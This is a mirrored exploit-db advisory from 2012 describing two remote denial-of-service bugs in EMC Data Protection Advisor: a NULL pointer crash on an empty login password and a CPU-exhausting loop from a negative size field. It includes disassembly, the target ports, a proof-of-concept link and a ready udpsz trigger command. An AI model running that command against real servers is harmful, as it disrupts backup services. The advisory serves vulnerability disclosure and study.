bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/dos/18688.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

151 lines
No EOL
4.8 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#######################################################################
Luigi Auriemma
Application: EMC Data Protection Advisor
http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
Versions: <= 5.8.1
Platforms: AIX, HP-UX, Linux, Solaris, Windows
Bugs: A] cProcessAuthenticationData NULL pointer
B] thread CPU 100%
Exploitation: remote
Date: 29 Mar 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"EMC Data Protection Advisor: Manage service levels, reduce complexity,
and eliminate manual efforts with EMCs powerful data protection
management software that automates monitoring, analysis, alerting, and
reporting across backup, replication, and virtual environments."
#######################################################################
=======
2) Bugs
=======
------------------------------------------
A] cProcessAuthenticationData NULL pointer
------------------------------------------
The missing password field or an empty password in the
AUTHENTICATECONNECTION command required to login leads to a NULL
pointer dereference in the DPA_Utilities.cProcessAuthenticationData
function:
10042EA0 /$ 55 PUSH EBP
10042EA1 |. 8BEC MOV EBP,ESP
10042EA3 |. 83EC 0C SUB ESP,0C
10042EA6 |. A1 B04F0C10 MOV EAX,DWORD PTR DS:[100C4FB0]
10042EAB |. 33C5 XOR EAX,EBP
10042EAD |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
10042EB0 |. 53 PUSH EBX
10042EB1 |. 56 PUSH ESI
10042EB2 |. 8BF1 MOV ESI,ECX
10042EB4 |. 57 PUSH EDI
10042EB5 |. 56 PUSH ESI
10042EB6 |. E8 93E3FBFF CALL DPA_Util.decodeString
10042EBB |. 8BC8 MOV ECX,EAX
10042EBD |. 83C4 08 ADD ESP,8
10042EC0 |. 8D59 01 LEA EBX,DWORD PTR DS:[ECX+1]
10042EC3 |> 8A11 /MOV DL,BYTE PTR DS:[ECX] ; strlen() NULL pointer
10042EC5 |. 83C1 01 |ADD ECX,1
10042EC8 |. 84D2 |TEST DL,DL
10042ECA |.^75 F7 \JNZ SHORT DPA_Util.10042EC3
------------------
B] thread CPU 100%
------------------
Endless loop in the DPA_Utilities library while handling the protocol
if it's used a negative 64bit size field:
100138FC > 3BF1 CMP ESI,ECX
100138FE . 75 0C JNZ SHORT DPA_Util.1001390C
10013900 . 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
10013903 . 0B55 E8 OR EDX,DWORD PTR SS:[EBP-18]
10013906 . 0F84 C1020000 JE DPA_Util.10013BCD
1001390C > 2975 DC SUB DWORD PTR SS:[EBP-24],ESI
1001390F . 68 20870910 PUSH DPA_Util.10098720 ; "nsReadRequest"
...
100137F0 > 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
100137F3 > 8B75 E4 MOV ESI,DWORD PTR SS:[EBP-1C]
100137F6 > 837D E8 00 CMP DWORD PTR SS:[EBP-18],0 ; signed comparison
100137FA . 7F 4A JG SHORT DPA_Util.10013846
100137FC . 7C 04 JL SHORT DPA_Util.10013802
100137FE . 85F6 TEST ESI,ESI
10013800 . 77 44 JA SHORT DPA_Util.10013846
10013802 > 837D E0 00 CMP DWORD PTR SS:[EBP-20],0 ; signed comparison
10013806 . 0F8C 0B040000 JL DPA_Util.10013C17
1001380C . 7F 0A JG SHORT DPA_Util.10013818
1001380E . 837D DC 00 CMP DWORD PTR SS:[EBP-24],0
10013812 . 0F86 FF030000 JBE DPA_Util.10013C17
10013818 > BF 1B700910 MOV EDI,DPA_Util.1009701B
1001381D . 33F6 XOR ESI,ESI
1001381F > 33C9 XOR ECX,ECX
10013821 . 894D F4 MOV DWORD PTR SS:[EBP-C],ECX
10013824 . 894D F0 MOV DWORD PTR SS:[EBP-10],ECX
10013827 . 390B CMP DWORD PTR DS:[EBX],ECX
10013829 . 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
1001382C . 894D EC MOV DWORD PTR SS:[EBP-14],ECX
1001382F . 0F84 C7000000 JE DPA_Util.100138FC
Note that this loop doesn't affect the working of the other connections
to the affected service.
Both the bugs can be exploited in the following services:
- DPA_Controller on port 3916
- DPA_Listener on port 4001
#######################################################################
===========
3) The Code
===========
A]
http://aluigi.org/poc/dpa_1.zip
dpa_1 SERVER
B]
http://aluigi.org/testz/udpsz.zip
udpsz -c "18446744073709551615/1/UNB" -T SERVER 3916 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Reference in a new issue View git blame Copy permalink